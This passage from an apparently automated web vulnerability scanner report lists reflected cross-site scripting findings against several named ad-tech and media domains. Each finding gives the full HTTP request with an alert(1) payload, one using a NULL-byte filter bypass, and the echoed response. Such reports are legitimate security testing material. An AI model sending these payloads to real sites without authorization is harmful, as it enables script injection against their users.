Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 5:29:52 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 553
Date: Mon, 11 Apr 2011 16:21:48 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;~okv=;net=cm;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=280882;contx=none;an=100;dc=w;btg=;~aopt=3/1/e4/0;~sscs=?20d43';alert(1)//82d6def5476http://altfarm.mediaplex.com/ad/ck/1551-48114-17349-5?mpt=532355">
...[SNIP]...
1.50. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99ce8'%3balert(1)//73fc8a370f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99ce8';alert(1)//73fc8a370f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-48114-17349-5?mpt=532355&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f&99ce8'%3balert(1)//73fc8a370f3=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 5:02:10 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 556
Date: Mon, 11 Apr 2011 16:21:50 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;~okv=;net=cm;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=280882;contx=none;an=100;dc=w;btg=;~aopt=3/1/e4/0;~sscs=?&99ce8';alert(1)//73fc8a370f3=1http://altfarm.mediaplex.com/ad/ck/1551-48114-17349-5?mpt=532355">
...[SNIP]...
1.51. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 73bbb<script>alert(1)</script>6a653815b0a was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds73bbb<script>alert(1)</script>6a653815b0a&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=15; BizoID=b67e419b-0f67-49a8-9374-7947627c8dff; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGLflw6f2XKRfTtLleii8orkNcii8xtm6s0H0QqF2XHhrAYH2Y9gYaTlvlcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL1EMdIdXxcQv1ExkNK7HUtFQY8D8EoTSfYed7OiiXiimUKQYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSvJB55ptYtaPdsnRGwuisv9sgNCHPPoPZ5lGIHcCOxxistyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZj6antyX3oWeUWjipXaLIwxMODCrIgmWLKYiiDGTipqiiCrEEI9eqbqVZ4MODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDzCvipnduuyh7dsnRGwuisv9lgdLN2CDPvYnN3SaI2ZY7d4UaMHFipcKz0lXg8MBAcYvQJipLd4ekU1f7MrQxrTtB1awN4NttI9ipMydkER68R1V1OiijTzGXiiboVarOcnmT09ciscCQ9N26R8nipxJ2jUNr57XvbckI43H8V9NXzJIXKwEOngHh2VamB2EXVXtg7b5stvcAWXzmjMHHvxUvUolOIqHLDnHii2Cip8QsPMip8WtDDSUrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmiiSGdip3ZDoZhGOAhZEwDNkhm2KROdrHzEWJkNyCeo9TMuoVcehkhLzzCCiiJrWm3g8yb3nqWIisiiis82c5lEROZWfllzeJyA5jHNe8JGn3rPyXs2c5lEROZWfpSxisuiiAPV3D

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:21:49 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (8dn4jnyemg4ky9svqgs28wds73bbb<script>alert(1)</script>6a653815b0a)
1.52. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload aa726<script>alert(1)</script>84d30c56979 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&callback_url=aa726<script>alert(1)</script>84d30c56979 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=15; BizoID=b67e419b-0f67-49a8-9374-7947627c8dff; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGLflw6f2XKRfTtLleii8orkNcii8xtm6s0H0QqF2XHhrAYH2Y9gYaTlvlcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL1EMdIdXxcQv1ExkNK7HUtFQY8D8EoTSfYed7OiiXiimUKQYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSvJB55ptYtaPdsnRGwuisv9sgNCHPPoPZ5lGIHcCOxxistyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZj6antyX3oWeUWjipXaLIwxMODCrIgmWLKYiiDGTipqiiCrEEI9eqbqVZ4MODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDzCvipnduuyh7dsnRGwuisv9lgdLN2CDPvYnN3SaI2ZY7d4UaMHFipcKz0lXg8MBAcYvQJipLd4ekU1f7MrQxrTtB1awN4NttI9ipMydkER68R1V1OiijTzGXiiboVarOcnmT09ciscCQ9N26R8nipxJ2jUNr57XvbckI43H8V9NXzJIXKwEOngHh2VamB2EXVXtg7b5stvcAWXzmjMHHvxUvUolOIqHLDnHii2Cip8QsPMip8WtDDSUrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmiiSGdip3ZDoZhGOAhZEwDNkhm2KROdrHzEWJkNyCeo9TMuoVcehkhLzzCCiiJrWm3g8yb3nqWIisiiis82c5lEROZWfllzeJyA5jHNe8JGn3rPyXs2c5lEROZWfpSxisuiiAPV3D

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:21:51 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: aa726<script>alert(1)</script>84d30c56979
1.53. http://api.kickapps.com/rest/comments/62976 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.kickapps.com
Path:   /rest/comments/62976

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ad4e3<script>alert(1)</script>98d73742cf0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rest/comments/62976?pgNum=1&pageSize=1&url=http%3A//www.wptz.com/news/27483035/detail.html&t=0SD0svP/Zk58tfSWXNJ/thuqOKP802x3&mediaType=emedia&userId=0&callback=IBSYS.hrst.commentCount.onKACommentDataad4e3<script>alert(1)</script>98d73742cf0 HTTP/1.1
Host: api.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Sat, 09 Apr 2011 12:31:30 GMT
Server: Noelios-Restlet-Engine/1.0..11
Content-Language: *
Content-Type: text/plain;charset=UTF-8
Content-Length: 167

IBSYS.hrst.commentCount.onKACommentDataad4e3<script>alert(1)</script>98d73742cf0({"totSize":0,"payload_type":"json","status":"1","results":[],"error":"","totPages":0})
1.54. http://api.zap2it.com/tvlistings/ZCShowtimeAction.do [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/ZCShowtimeAction.do

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00474b3'%3balert(1)//fa25becbfb0 was submitted in the aid parameter. This input was echoed as 474b3';alert(1)//fa25becbfb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /tvlistings/ZCShowtimeAction.do?ap=wo&md=getPrimetimeWhatsOn&v=2&aid=wptzdt2%00474b3'%3balert(1)//fa25becbfb0&zip=12901&stnlt=53393 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: public
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Cache-Control: must-revalidate, max-age=0, post-check=0, pre-check=0
Expires: Sat, 09 Apr 2011 12:30:01 GMT
Date: Sat, 09 Apr 2011 12:30:01 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 10056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
e(obj, 'd', 'PDF Document', 'Default Grid View');
zc.openPrintPage();
}

dfpKeyValues='';
var ty='';
var z = 'default';
var dfp_zip='';
var dfp_aid='wptzdt2.474b3';alert(1)//fa25becbfb0';
var dfp_lid='';

</script>
...[SNIP]...
1.55. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 4c6c5<script>alert(1)</script>2e6cc7273d9 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=84c6c5<script>alert(1)</script>2e6cc7273d9&c2=6820648&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"84c6c5<script>alert(1)</script>2e6cc7273d9", c2:"6820648", c3:"1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


1.56. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload d6794<script>alert(1)</script>7f680a795f was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=d6794<script>alert(1)</script>7f680a795f&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 18 Apr 2011 17:41:23 GMT
Date: Mon, 11 Apr 2011 17:41:23 GMT
Connection: close
Content-Length: 1233

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"d6794<script>alert(1)</script>7f680a795f", c15:"", c16:"", r:""});


1.57. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 980ee<script>alert(1)</script>cda0329ceaa was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=980ee<script>alert(1)</script>cda0329ceaa HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 18 Apr 2011 17:41:23 GMT
Date: Mon, 11 Apr 2011 17:41:23 GMT
Connection: close
Content-Length: 1234

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"980ee<script>alert(1)</script>cda0329ceaa", c16:"", r:""});


1.58. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 3fefc<script>alert(1)</script>27501cbb4f9 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=68206483fefc<script>alert(1)</script>27501cbb4f9&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3